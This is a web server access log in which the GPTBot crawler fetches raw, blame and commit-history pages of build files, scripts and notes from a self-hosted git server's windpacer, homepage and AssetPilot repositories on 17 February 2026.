"/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10291] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10289] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10290] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12631] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:15:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12632] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:15:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:15:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:15:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2630] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:15:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12630] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:15:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:15:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10989] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" -[17/Feb/2026:15:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 14920] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" -[17/Feb/2026:15:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" [Client 74.7.227.38] [Length 15263] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" -[17/Feb/2026:15:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" [Client 74.7.227.38] [Length 10140] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" -[17/Feb/2026:15:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:15:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 9898] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:15:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 9926] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:15:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 2813234] [Gzip 25.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:15:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" -[17/Feb/2026:15:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" -[17/Feb/2026:15:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" -[17/Feb/2026:15:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=html%2findex.html" [Client 74.7.227.38] [Length 21091] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:15:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10171] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:15:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11220] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11912] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" -[17/Feb/2026:15:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10182] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 